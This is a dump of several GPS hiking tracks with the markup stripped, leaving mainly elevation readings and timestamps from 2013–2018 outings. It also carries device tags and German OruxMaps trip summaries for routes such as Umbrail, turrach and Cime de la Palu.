+
+
+1126.43
+2015-07-30T10:48:08Z
+
+
+1131.97
+2015-07-30T10:49:00Z
+
+
+1131.95
+2015-07-30T10:49:36Z
+
+
+1162.43
+2015-07-30T10:53:27Z
+
+
+1177.9
+2015-07-30T10:55:51Z
+
+
+1193.81
+2015-07-30T10:59:37Z
+
+
+1191.94
+2015-07-30T10:59:55Z
+
+
+1190.95
+2015-07-30T11:00:42Z
+
+
+1198.87
+2015-07-30T11:01:02Z
+
+
+1238.97
+2015-07-30T11:05:02Z
+
+
+1246.9
+2015-07-30T11:08:11Z
+
+
+1272.35
+2015-07-30T11:10:47Z
+
+
+1294.68
+2015-07-30T11:14:02Z
+
+
+1291.95
+2015-07-30T11:15:33Z
+
+
+1337.84
+2015-07-30T11:21:09Z
+
+
+1348.03
+2015-07-30T11:22:32Z
+
+
+1419.81
+2015-07-30T11:29:10Z
+
+
+1448.93
+2015-07-30T11:32:45Z
+
+
+1500.93
+2015-07-30T11:38:51Z
+
+
+1508.78
+2015-07-30T11:40:03Z
+
+
+1557.7
+2015-07-30T11:45:57Z
+
+
+1555.18
+2015-07-30T11:46:41Z
+
+
+1552.91
+2015-07-30T11:48:41Z
+
+
+1568.8
+2015-07-30T11:49:43Z
+
+
+1575.91
+2015-07-30T11:50:49Z
+
+
+1590.47
+2015-07-30T11:52:51Z
+
+
+1595.4
+2015-07-30T11:53:20Z
+
+
+1605.9
+2015-07-30T11:55:28Z
+
+
+1614.8
+2015-07-30T11:56:33Z
+
+
+1634.86
+2015-07-30T12:10:46Z
+
+
+1629.49
+2015-07-30T12:11:45Z
+
+
+1652.24
+2015-07-30T12:14:44Z
+
+
+1716.04
+2015-07-30T12:23:43Z
+
+
+1752.06
+2015-07-30T12:30:00Z
+
+
+1765.39
+2015-07-30T12:32:36Z
+
+
+1767.78
+2015-07-30T12:34:18Z
+
+
+1798.9
+2015-07-30T12:40:51Z
+
+
+1828.97
+2015-07-30T12:44:54Z
+
+
+1857.55
+2015-07-30T12:50:43Z
+
+
+1866.97
+2015-07-30T12:52:55Z
+
+
+1873.76
+2015-07-30T12:54:00Z
+
+
+1881.93
+2015-07-30T12:55:17Z
+
+
+1887.21
+2015-07-30T12:55:51Z
+
+
+1906.71
+2015-07-30T12:58:54Z
+
+
+1920.92
+2015-07-30T13:01:17Z
+
+
+1959.3
+2015-07-30T13:06:37Z
+
+
+2004.87
+2015-07-30T13:14:04Z
+
+
+2047.8
+2015-07-30T13:21:49Z
+
+
+2159.33
+2015-07-30T13:37:14Z
+
+
+2180.93
+2015-07-30T13:42:03Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-12-05T15:06:03Z
+
+
+2015-12-04 14:09:52
+
+
+
+
+
+
+1176.79
+2015-12-04T09:01:31Z
+
+
+1211.4
+2015-12-04T09:07:00Z
+
+
+1236.87
+2015-12-04T09:09:34Z
+
+
+1253.7
+2015-12-04T09:11:16Z
+
+
+1270.04
+2015-12-04T09:12:42Z
+
+
+1273.4
+2015-12-04T09:13:08Z
+
+
+1284.94
+2015-12-04T09:14:17Z
+
+
+1342.14
+2015-12-04T09:21:01Z
+
+
+1365.69
+2015-12-04T09:23:16Z
+
+
+1380.59
+2015-12-04T09:25:07Z
+
+
+1393.57
+2015-12-04T09:26:57Z
+
+
+1400.78
+2015-12-04T09:28:24Z
+
+
+1416.16
+2015-12-04T09:30:01Z
+
+
+1421.93
+2015-12-04T09:31:18Z
+
+
+1428.66
+2015-12-04T09:36:45Z
+
+
+1432.98
+2015-12-04T09:38:12Z
+
+
+1448.84
+2015-12-04T09:42:09Z
+
+
+1458.94
+2015-12-04T09:43:26Z
+
+
+1579.1
+2015-12-04T09:57:47Z
+
+
+1610.35
+2015-12-04T10:01:55Z
+
+
+1635.34
+2015-12-04T10:05:08Z
+
+
+1662.26
+2015-12-04T10:08:29Z
+
+
+1692.06
+2015-12-04T10:13:38Z
+
+
+1708.88
+2015-12-04T10:17:00Z
+
+
+1712.73
+2015-12-04T10:18:32Z
+
+
+1718.97
+2015-12-04T10:31:16Z
+
+
+1712.25
+2015-12-04T11:19:33Z
+
+
+1708.88
+2015-12-04T11:19:55Z
+
+
+1690.62
+2015-12-04T11:21:37Z
+
+
+1671.87
+2015-12-04T11:24:29Z
+
+
+1668.51
+2015-12-04T11:26:33Z
+
+
+1662.26
+2015-12-04T11:28:45Z
+
+
+1662.26
+2015-12-04T11:31:30Z
+
+
+1631.98
+2015-12-04T11:36:38Z
+
+
+1623.32
+2015-12-04T11:45:58Z
+
+
+1614.67
+2015-12-04T12:04:08Z
+
+
+1614.67
+2015-12-04T12:05:32Z
+
+
+1596.41
+2015-12-04T12:08:16Z
+
+
+1565.16
+2015-12-04T12:11:25Z
+
+
+1555.07
+2015-12-04T12:12:20Z
+
+
+1548.82
+2015-12-04T12:13:09Z
+
+
+1525.27
+2015-12-04T12:15:19Z
+
+
+1489.7
+2015-12-04T12:18:36Z
+
+
+1477.2
+2015-12-04T12:21:58Z
+
+
+1470.47
+2015-12-04T12:23:10Z
+
+
+1454.13
+2015-12-04T12:26:06Z
+
+
+1448.84
+2015-12-04T12:27:10Z
+
+
+1430.1
+2015-12-04T12:29:32Z
+
+
+1419.04
+2015-12-04T12:30:53Z
+
+
+1408.47
+2015-12-04T12:32:06Z
+
+
+1388.28
+2015-12-04T12:33:55Z
+
+
+1345.98
+2015-12-04T12:38:44Z
+
+
+1319.07
+2015-12-04T12:41:30Z
+
+
+1271.96
+2015-12-04T12:46:25Z
+
+
+1258.5
+2015-12-04T12:47:40Z
+
+
+1245.53
+2015-12-04T12:49:45Z
+
+
+1230.62
+2015-12-04T12:51:41Z
+
+
+1212.36
+2015-12-04T12:53:20Z
+
+
+1202.27
+2015-12-04T12:57:06Z
+
+
+1178.71
+2015-12-04T13:01:05Z
+
+
+1167.18
+2015-12-04T13:02:32Z
+
+
+1157.56
+2015-12-04T13:03:15Z
+
+
+1129.69
+2015-12-04T13:05:47Z
+
+
+1112.86
+2015-12-04T13:07:06Z
+
+
+1102.77
+2015-12-04T13:08:00Z
+
+
+1097.48
+2015-12-04T13:09:32Z
+ "
+"
+
+
+
+
+
+
+Best Mountain Artists - Tourenplanung Wandern Trekking Outdoor
+2016-11-07T09:36:21Z
+
+
+Slættaratindur
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Umbrail
+
+
+
+
+
+OruxMaps
+2015-08-18T06:00:28Z
+
+
+Umbrail
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Umbrail</h2><br /><p>Startzeit: 08/18/2015 08:00</p><p>Zielzeit: 08/18/2015 09:29</p><p>Strecke: 2,7km (01:29)</p><p>Bewegungszeit: 00:53</p><p>Ø-Geschwindigkeit: 1,8km/h</p><p>Netto-Geschwindigkeit: 3km/h</p><p>Max. Geschwindigkeit: 6,8km/h</p><p>Minimale Höhe: 2496m</p><p>Maximale Höhe: 3029m</p><p>Steig-Geschw.: 396,5m/h</p><p>Sink-Geschw.: -342,9m/h</p><p>Aufstieg: 538m</p><p>Abstieg: -45m</p><p>Steigzeit: 01:21</p><p>Sinkzeit: 00:07</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2532.01
+2015-08-18T06:00:30Z
+
+
+2498.89
+2015-08-18T06:03:53Z
+
+
+2499.37
+2015-08-18T06:06:09Z
+
+
+2500.85
+2015-08-18T06:07:26Z
+
+
+2521.41
+2015-08-18T06:10:17Z
+
+
+2523.35
+2015-08-18T06:11:09Z
+
+
+2549.45
+2015-08-18T06:14:14Z
+
+
+2563.47
+2015-08-18T06:16:02Z
+
+
+2583.38
+2015-08-18T06:18:58Z
+
+
+2590.84
+2015-08-18T06:20:28Z
+
+
+2597.37
+2015-08-18T06:21:17Z
+
+
+2608.23
+2015-08-18T06:22:09Z
+
+
+2612.25
+2015-08-18T06:23:06Z
+
+
+2615.25
+2015-08-18T06:23:40Z
+
+
+2623.48
+2015-08-18T06:24:36Z
+
+
+2630.51
+2015-08-18T06:25:36Z
+
+
+2643.89
+2015-08-18T06:26:58Z
+
+
+2644.88
+2015-08-18T06:27:52Z
+
+
+2673.01
+2015-08-18T06:31:52Z
+
+
+2683.49
+2015-08-18T06:33:28Z
+
+
+2714.01
+2015-08-18T06:36:54Z
+
+
+2720.2
+2015-08-18T06:39:05Z
+
+
+2751.76
+2015-08-18T06:43:32Z
+
+
+2759.51
+2015-08-18T06:44:46Z
+
+
+2791.42
+2015-08-18T06:49:19Z
+
+
+2807.91
+2015-08-18T06:52:32Z
+
+
+2853.38
+2015-08-18T06:58:56Z
+
+
+2872.78
+2015-08-18T07:00:27Z
+
+
+2878.75
+2015-08-18T07:01:21Z
+
+
+2892.38
+2015-08-18T07:03:22Z
+
+
+2904.92
+2015-08-18T07:05:26Z
+
+
+2913.88
+2015-08-18T07:08:18Z
+
+
+2947.28
+2015-08-18T07:11:28Z
+
+
+2967.76
+2015-08-18T07:14:11Z
+
+
+2965.26
+2015-08-18T07:14:43Z
+
+
+2979.38
+2015-08-18T07:16:09Z
+
+
+2988.88
+2015-08-18T07:19:30Z
+
+
+3010.88
+2015-08-18T07:24:51Z
+
+
+3029.38
+2015-08-18T07:27:03Z
+
+
+3024.85
+2015-08-18T07:29:58Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-09T16:16:20Z
+
+2015-04-09 18:16:18
+
+
+
+
+
+
+814.75
+2015-04-09T14:02:30Z
+
+
+820.72
+2015-04-09T14:03:59Z
+
+
+868.15
+2015-04-09T14:08:53Z
+
+
+890.66
+2015-04-09T14:10:32Z
+
+
+946.51
+2015-04-09T14:16:18Z
+
+
+975.96
+2015-04-09T14:20:18Z
+
+
+1018.07
+2015-04-09T14:24:49Z
+
+
+1047.62
+2015-04-09T14:27:08Z
+
+
+1075.66
+2015-04-09T14:34:20Z
+
+
+1097.55
+2015-04-09T14:36:34Z
+
+
+1115.53
+2015-04-09T14:39:34Z
+
+
+1161.47
+2015-04-09T14:45:28Z
+
+
+1141.27
+2015-04-09T15:38:47Z
+
+
+1158.08
+2015-04-09T15:43:56Z
+
+
+1126.53
+2015-04-09T15:47:33Z
+
+
+1100.93
+2015-04-09T15:51:02Z
+
+
+1099.06
+2015-04-09T15:58:04Z
+
+
+1071.31
+2015-04-09T15:59:52Z
+
+
+1033.16
+2015-04-09T16:01:51Z
+
+
+1004.37
+2015-04-09T16:03:27Z
+
+
+983.91
+2015-04-09T16:04:50Z
+
+
+934.62
+2015-04-09T16:07:16Z
+
+
+916.19
+2015-04-09T16:08:48Z
+
+
+879.28
+2015-04-09T16:11:16Z
+
+
+829.08
+2015-04-09T16:14:29Z
+
+
+821.5
+2015-04-09T16:16:14Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-10-10T16:59:00Z
+
+
+Szruich
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Szruich</h2><br /><p>Startzeit: 10/10/2017 10:40</p><p>Zielzeit: 10/10/2017 11:25</p><p>Strecke: 3km (00:45)</p><p>Bewegungszeit: 00:42</p><p>Ø-Geschwindigkeit: 3,9km/h</p><p>Netto-Geschwindigkeit: 4,3km/h</p><p>Max. Geschwindigkeit: 39km/h</p><p>Minimale Höhe: 88m</p><p>Maximale Höhe: 426m</p><p>Steig-Geschw.: 497,1m/h</p><p>Sink-Geschw.: -318,8m/h</p><p>Aufstieg: 350m</p><p>Abstieg: -18m</p><p>Steigzeit: 00:42</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+
+
+
+
+
+89.9
+2017-10-10T09:41:15Z
+
+
+106.74
+2017-10-10T09:42:33Z
+
+
+121.76
+2017-10-10T09:44:17Z
+
+
+126.52
+2017-10-10T09:45:15Z
+
+
+128.47
+2017-10-10T09:45:55Z
+
+
+144.02
+2017-10-10T09:46:50Z
+
+
+149.39
+2017-10-10T09:47:55Z
+
+
+159.16
+2017-10-10T09:48:31Z
+
+
+191.62
+2017-10-10T09:51:23Z
+
+
+193.99
+2017-10-10T09:52:07Z
+
+
+202.3
+2017-10-10T09:53:08Z
+
+
+237.73
+2017-10-10T09:56:46Z
+
+
+244.49
+2017-10-10T09:57:26Z
+
+
+255.74
+2017-10-10T09:59:41Z
+
+
+268.9
+2017-10-10T10:00:51Z
+
+
+292.06
+2017-10-10T10:03:22Z
+
+
+296.41
+2017-10-10T10:04:20Z
+
+
+302.99
+2017-10-10T10:04:40Z
+
+
+321.39
+2017-10-10T10:07:30Z
+
+
+340.34
+2017-10-10T10:10:00Z
+
+
+354.11
+2017-10-10T10:11:39Z
+
+
+354.9
+2017-10-10T10:14:02Z
+
+
+365.15
+2017-10-10T10:14:42Z
+
+
+390.15
+2017-10-10T10:17:27Z
+
+
+390.8
+2017-10-10T10:17:53Z
+
+
+391.93
+2017-10-10T10:20:02Z
+
+
+400.88
+2017-10-10T10:22:28Z
+
+
+409.39
+2017-10-10T10:23:48Z
+
+
+426.52
+2017-10-10T10:25:59Z
+ "
+"
+
+
+
+
+
+
+
+Linie
+
+
+
+2306.2
+
+
+2307.2
+
+
+2306.1
+
+
+2329.5
+
+
+2333.4
+
+
+2338.6
+
+
+2349.5
+
+
+2349.0
+
+
+2343.8
+
+
+2342.8
+
+
+2336.1
+
+
+2327.0
+
+
+2326.8
+
+
+2327.1
+
+
+2326.4
+
+
+2325.6
+
+
+2326.7
+
+
+2327.3
+
+
+2326.4
+
+
+2332.3
+
+
+2342.4
+
+
+2350.8
+
+
+2359.0
+
+
+2367.7
+
+
+2392.1
+
+
+2408.2
+
+
+2412.6
+
+
+2435.0
+
+
+2443.7
+
+
+2474.0
+
+
+2502.2
+
+
+2507.6
+
+
+2558.7
+
+
+2564.0
+
+
+2571.3
+
+
+2578.7
+ "
+"
+
+
+
+
+
+
+
+Move
+
+
+
+-1.0
+2015-01-04T09:21:40Z
+
+
+-0.0299999993294477
+0.600000023841858
+1.324
+-1
+1035
+27.6000003814697
+
+-1.0
+2015-01-04T10:05:28Z
+
+
+0
+1.10000002384186
+2775
+-1
+1035
+22
+
+
+ "
+"
+
+2013-12-23T13:58:42Z
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-06-02T19:16:41Z
+
+2015-06-02 21:16:39
+
+
+
+
+
+
+1143.73
+2015-06-02T13:51:08Z
+
+
+1151.49
+2015-06-02T13:52:50Z
+
+
+1163.34
+2015-06-02T13:54:02Z
+
+
+1175.27
+2015-06-02T13:55:16Z
+
+
+1185.56
+2015-06-02T13:56:58Z
+
+
+1216.14
+2015-06-02T14:00:13Z
+
+
+1229.16
+2015-06-02T14:01:45Z
+
+
+1264.15
+2015-06-02T14:04:06Z
+
+
+1310.57
+2015-06-02T14:07:50Z
+
+
+1344.29
+2015-06-02T14:10:10Z
+
+
+1371.54
+2015-06-02T14:12:13Z
+
+
+1399.19
+2015-06-02T14:14:14Z
+
+
+1411.03
+2015-06-02T14:18:34Z
+
+
+1437.16
+2015-06-02T14:20:52Z
+
+
+1470.11
+2015-06-02T14:23:07Z
+
+
+1494.92
+2015-06-02T14:25:05Z
+
+
+1549.67
+2015-06-02T14:29:49Z
+
+
+1600.4
+2015-06-02T14:34:30Z
+
+
+1627.88
+2015-06-02T14:36:44Z
+
+
+1638.99
+2015-06-02T14:48:03Z
+
+
+1649.94
+2015-06-02T14:50:12Z
+
+
+1667.83
+2015-06-02T14:51:48Z
+
+
+1689.25
+2015-06-02T14:54:45Z
+
+
+1708.41
+2015-06-02T14:56:46Z
+
+
+1737.52
+2015-06-02T15:01:12Z
+
+
+1758.9
+2015-06-02T15:03:18Z
+
+
+1765.96
+2015-06-02T15:05:23Z
+
+
+1791.28
+2015-06-02T15:07:55Z
+
+
+1810.1
+2015-06-02T15:19:23Z
+
+
+1794.68
+2015-06-02T15:21:09Z
+
+
+1771.56
+2015-06-02T15:23:20Z
+
+
+1780.33
+2015-06-02T15:25:53Z
+
+
+1805.01
+2015-06-02T15:29:19Z
+
+
+1813.85
+2015-06-02T15:31:45Z
+
+
+1824.08
+2015-06-02T15:35:37Z
+
+
+1825.56
+2015-06-02T16:11:39Z
+
+
+1861.18
+2015-06-02T16:14:54Z
+
+
+1882.1
+2015-06-02T16:18:45Z
+
+
+1913.63
+2015-06-02T16:21:27Z
+
+
+1948.67
+2015-06-02T16:30:58Z
+
+
+1967.98
+2015-06-02T16:34:29Z
+
+
+2015.16
+2015-06-02T16:56:34Z
+
+
+2038.85
+2015-06-02T17:04:10Z
+
+
+2025.32
+2015-06-02T17:38:26Z
+
+
+1970.93
+2015-06-02T17:51:57Z
+
+
+1944.24
+2015-06-02T17:55:04Z
+
+
+1901.48
+2015-06-02T17:59:31Z
+
+
+1839.93
+2015-06-02T18:04:49Z
+
+
+1805.41
+2015-06-02T18:07:47Z
+
+
+1772.56
+2015-06-02T18:10:20Z
+
+
+1706.58
+2015-06-02T18:16:47Z
+
+
+1656.37
+2015-06-02T18:22:05Z
+
+
+1639.15
+2015-06-02T18:24:22Z
+
+
+1628.84
+2015-06-02T18:38:59Z
+
+
+1601.28
+2015-06-02T18:41:29Z
+
+
+1546.68
+2015-06-02T18:45:08Z
+
+
+1489.71
+2015-06-02T18:51:08Z
+
+
+1427.33
+2015-06-02T18:54:20Z
+
+
+1398.4
+2015-06-02T18:56:06Z
+
+
+1361.5
+2015-06-02T18:58:13Z
+
+
+1332.59
+2015-06-02T18:59:44Z
+
+
+1265.27
+2015-06-02T19:03:28Z
+
+
+1214.36
+2015-06-02T19:07:41Z
+
+
+1200.14
+2015-06-02T19:09:21Z
+
+
+1186.28
+2015-06-02T19:10:30Z
+
+
+1173.85
+2015-06-02T19:11:48Z
+
+
+1162.7
+2015-06-02T19:13:00Z
+
+
+1150.84
+2015-06-02T19:14:05Z
+
+
+1140.74
+2015-06-02T19:15:30Z
+
+
+1136.34
+2015-06-02T19:16:08Z
+ "
+"
+
+
+
+
+
+
+
+2018-01-22 S. Pellegrino Zucco
+
+
+
+360.100006103516
+2018-01-22T07:16:38Z
+
+
+362.399993896484
+2018-01-22T07:19:10Z
+
+
+364.170013427734
+2018-01-22T07:20:40Z
+
+
+368.380004882812
+2018-01-22T07:21:52Z
+
+
+379.359985351562
+2018-01-22T07:23:10Z
+
+
+383.119995117188
+2018-01-22T07:23:48Z
+
+
+402.230010986328
+2018-01-22T07:25:02Z
+
+
+410.5
+2018-01-22T07:26:40Z
+
+
+412.600006103516
+2018-01-22T07:27:22Z
+
+
+416.920013427734
+2018-01-22T07:28:30Z
+
+
+421.279998779297
+2018-01-22T07:28:48Z
+
+
+431.170013427734
+2018-01-22T07:30:10Z
+
+
+448.429992675781
+2018-01-22T07:32:32Z
+
+
+473.429992675781
+2018-01-22T07:35:20Z
+
+
+663.349975585938
+2018-01-22T07:58:44Z
+
+
+695.799987792969
+2018-01-22T08:03:06Z
+
+
+743.760009765625
+2018-01-22T08:07:20Z
+
+
+827.590026855469
+2018-01-22T08:18:34Z
+
+
+896.320007324219
+2018-01-22T08:27:46Z
+
+
+958.299987792969
+2018-01-22T08:33:46Z
+
+
+1014.70001220703
+2018-01-22T09:18:06Z
+
+
+1036.58996582031
+2018-01-22T09:22:38Z
+
+
+1061.22998046875
+2018-01-22T09:29:12Z
+
+
+1115.68005371094
+2018-01-22T09:37:08Z
+
+
+1127.51000976562
+2018-01-22T09:38:18Z
+
+
+1156.5400390625
+2018-01-22T09:46:54Z
+
+
+1163.26000976562
+2018-01-22T09:49:28Z
+
+
+1231.69995117188
+2018-01-22T09:56:42Z
+
+
+1208.0400390625
+2018-01-22T10:05:46Z
+
+
+1182.46997070312
+2018-01-22T10:09:24Z
+
+
+1146.85998535156
+2018-01-22T10:10:48Z
+
+
+1124.81994628906
+2018-01-22T10:12:14Z
+
+
+1105.31005859375
+2018-01-22T10:14:36Z
+
+
+1098.88000488281
+2018-01-22T10:16:06Z
+
+
+1013.32000732422
+2018-01-22T10:27:40Z
+
+
+1007.40002441406
+2018-01-22T10:27:54Z
+
+
+975.510009765625
+2018-01-22T10:29:24Z
+
+
+958.780029296875
+2018-01-22T10:31:46Z
+
+
+930.609985351562
+2018-01-22T10:36:14Z
+
+
+922.5
+2018-01-22T10:37:36Z
+
+
+891.909973144531
+2018-01-22T10:42:06Z
+
+
+847.210021972656
+2018-01-22T10:43:46Z
+
+
+812.919982910156
+2018-01-22T10:44:30Z
+
+
+738.650024414062
+2018-01-22T10:49:42Z
+
+
+723.659973144531
+2018-01-22T10:51:42Z
+
+
+692.179992675781
+2018-01-22T10:53:58Z
+
+
+681.450012207031
+2018-01-22T10:54:38Z
+
+
+676.609985351562
+2018-01-22T10:55:14Z
+
+
+617.559997558594
+2018-01-22T10:59:18Z
+
+
+608.539978027344
+2018-01-22T10:59:52Z
+
+
+572.5
+2018-01-22T11:01:58Z
+
+
+539.409973144531
+2018-01-22T11:04:06Z
+
+
+516.719970703125
+2018-01-22T11:05:58Z
+
+
+500.869995117188
+2018-01-22T11:06:56Z
+
+
+492.670013427734
+2018-01-22T11:07:30Z
+
+
+433.850006103516
+2018-01-22T11:10:10Z
+
+
+410.589996337891
+2018-01-22T11:11:56Z
+
+
+389.869995117188
+2018-01-22T11:13:46Z
+
+
+366.950012207031
+2018-01-22T11:14:58Z
+
+
+358.859985351562
+2018-01-22T11:15:26Z
+
+
+356.779998779297
+2018-01-22T11:16:00Z
+
+
+354.600006103516
+2018-01-22T11:16:34Z
+
+
+356.0
+2018-01-22T11:17:00Z
+
+
+359.899993896484
+2018-01-22T11:18:06Z
+ "
+"
+
+
+
+
+
+
+
+2015-04-26 15:16:12
+
+
+
+938.86
+
+
+944.15
+
+
+964.34
+
+
+997.99
+
+
+1015.29
+
+
+1031.15
+
+
+1037.88
+
+
+1047.49
+
+
+1066.72
+
+
+1090.27
+
+
+1101.33
+
+
+1114.79
+
+
+1144.59
+
+
+1153.24
+
+
+1180.64
+
+
+1208.51
+
+
+1251.77
+
+
+1276.29
+
+
+1305.61
+
+
+1374.34
+
+
+1379.63
+
+
+1390.2
+
+
+1395.49
+
+
+1405.1
+
+
+1411.35
+
+
+1417.6
+
+
+1425.29
+
+
+1430.58
+
+
+1433.94
+
+
+1427.21
+
+
+1420.0
+
+
+1411.35
+
+
+1406.55
+
+
+1396.93
+
+
+1393.09
+
+
+1382.51
+
+
+1380.59
+
+
+1339.73
+
+
+1317.62
+
+
+1288.3
+
+
+1270.04
+
+
+1262.35
+
+
+1244.08
+
+
+1234.47
+
+
+1196.98
+
+
+1172.47
+
+
+1162.85
+
+
+1135.45
+
+
+1121.03
+
+
+1097.48
+
+
+1077.78
+
+
+1070.08
+
+
+1054.22
+
+
+1038.84
+
+
+1024.42
+
+
+991.26
+
+
+975.88
+
+
+965.3
+
+
+967.7
+ "
+"
+
+
+
+
+
+
+
+Djouce1
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Bärschwil-Erschwil
+
+
+
+
+
+
+Bärschwil-Erschwil
+
+
+
+440.6
+
+
+417.7
+
+
+444.1
+
+
+440.0
+
+
+437.6
+
+
+441.4
+
+
+446.2
+
+
+508.2
+
+
+556.3
+
+
+649.4
+
+
+697.1
+
+
+624.0
+
+
+571.1
+
+
+566.7
+
+
+538.0
+
+
+535.9
+
+
+538.1
+
+
+561.6
+
+
+627.4
+
+
+654.8
+
+
+689.8
+
+
+723.4
+
+
+712.5
+
+
+694.1
+
+
+634.0
+
+
+621.8
+
+
+596.0
+
+
+602.2
+
+
+619.5
+
+
+582.4
+
+
+560.9
+
+
+543.4
+
+
+533.5
+
+
+525.5
+
+
+507.2
+
+
+481.5
+
+
+474.8
+
+
+457.0
+
+
+453.0
+
+
+452.1
+
+
+451.3
+
+
+449.7
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+turrach
+
+
+
+
+
+OruxMaps
+2015-06-17T16:09:17Z
+
+
+turrach
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: turrach</h2><br /><p>Startzeit: 06/17/2015 18:09</p><p>Zielzeit: 06/17/2015 19:17</p><p>Strecke: 3,6km (01:07)</p><p>Bewegungszeit: 00:52</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4,2km/h</p><p>Max. Geschwindigkeit: 8,3km/h</p><p>Minimale Höhe: 1771m</p><p>Maximale Höhe: 2230m</p><p>Steig-Geschw.: 613,4m/h</p><p>Sink-Geschw.: -660,7m/h</p><p>Aufstieg: 551m</p><p>Abstieg: -95m</p><p>Steigzeit: 00:53</p><p>Sinkzeit: 00:08</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1773.71
+2015-06-17T16:09:18Z
+
+
+1774.53
+2015-06-17T16:09:50Z
+
+
+1783.75
+2015-06-17T16:10:47Z
+
+
+1776.37
+2015-06-17T16:11:50Z
+
+
+1783.58
+2015-06-17T16:12:08Z
+
+
+1785.05
+2015-06-17T16:12:56Z
+
+
+1776.65
+2015-06-17T16:13:56Z
+
+
+1798.65
+2015-06-17T16:16:50Z
+
+
+1811.64
+2015-06-17T16:18:20Z
+
+
+1838.21
+2015-06-17T16:20:01Z
+
+
+1836.58
+2015-06-17T16:21:29Z
+
+
+1837.18
+2015-06-17T16:21:47Z
+
+
+1853.23
+2015-06-17T16:22:51Z
+
+
+1863.59
+2015-06-17T16:23:28Z
+
+
+1860.17
+2015-06-17T16:24:03Z
+
+
+1877.65
+2015-06-17T16:25:06Z
+
+
+1886.7
+2015-06-17T16:26:14Z
+
+
+1907.34
+2015-06-17T16:27:25Z
+
+
+1909.46
+2015-06-17T16:27:51Z
+
+
+1912.22
+2015-06-17T16:28:18Z
+
+
+1924.22
+2015-06-17T16:29:30Z
+
+
+1947.31
+2015-06-17T16:31:06Z
+
+
+1949.74
+2015-06-17T16:31:28Z
+
+
+1948.74
+2015-06-17T16:31:48Z
+
+
+1952.79
+2015-06-17T16:32:35Z
+
+
+1968.2
+2015-06-17T16:33:31Z
+
+
+1987.19
+2015-06-17T16:35:45Z
+
+
+2020.68
+2015-06-17T16:38:37Z
+
+
+2040.21
+2015-06-17T16:40:36Z
+
+
+2105.59
+2015-06-17T16:48:52Z
+
+
+2128.66
+2015-06-17T16:51:24Z
+
+
+2140.47
+2015-06-17T16:52:38Z
+
+
+2174.34
+2015-06-17T16:56:46Z
+
+
+2207.8
+2015-06-17T17:01:25Z
+
+
+2167.92
+2015-06-17T17:04:26Z
+
+
+2203.21
+2015-06-17T17:10:00Z
+
+
+2211.23
+2015-06-17T17:10:58Z
+
+
+2216.15
+2015-06-17T17:12:15Z
+
+
+2225.11
+2015-06-17T17:14:41Z
+
+
+2223.74
+2015-06-17T17:15:02Z
+
+
+2230.46
+2015-06-17T17:15:43Z
+
+
+2223.3
+2015-06-17T17:17:06Z
+ "
+"
+
+
+Cime de la palu 2132m
+
+
+
+
+
+OruxMaps
+2016-05-04T10:44:14Z
+
+
+Cime de la palu 2132m
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Cime de la palu 2132m</h2><br /><p>Startzeit: 05/04/2016 12:44</p><p>Zielzeit: 05/04/2016 15:31</p><p>Strecke: 4,9km (02:47)</p><p>Bewegungszeit: 01:26</p><p>Ø-Geschwindigkeit: 1,7km/h</p><p>Netto-Geschwindigkeit: 3,4km/h</p><p>Max. Geschwindigkeit: 7,1km/h</p><p>Minimale Höhe: 978m</p><p>Maximale Höhe: 2134m</p><p>Steig-Geschw.: 441,8m/h</p><p>Sink-Geschw.: -709,5m/h</p><p>Aufstieg: 1156m</p><p>Abstieg: -42m</p><p>Steigzeit: 02:37</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1013.19
+2016-05-04T10:44:11Z
+
+
+1002.02
+2016-05-04T10:45:15Z
+
+
+991.44
+2016-05-04T10:45:53Z
+
+
+988.38
+2016-05-04T10:47:44Z
+
+
+997.59
+2016-05-04T10:50:03Z
+
+
+1017.69
+2016-05-04T10:51:25Z
+
+
+1026.06
+2016-05-04T10:53:13Z
+
+
+1051.94
+2016-05-04T10:55:30Z
+
+
+1054.62
+2016-05-04T10:56:10Z
+
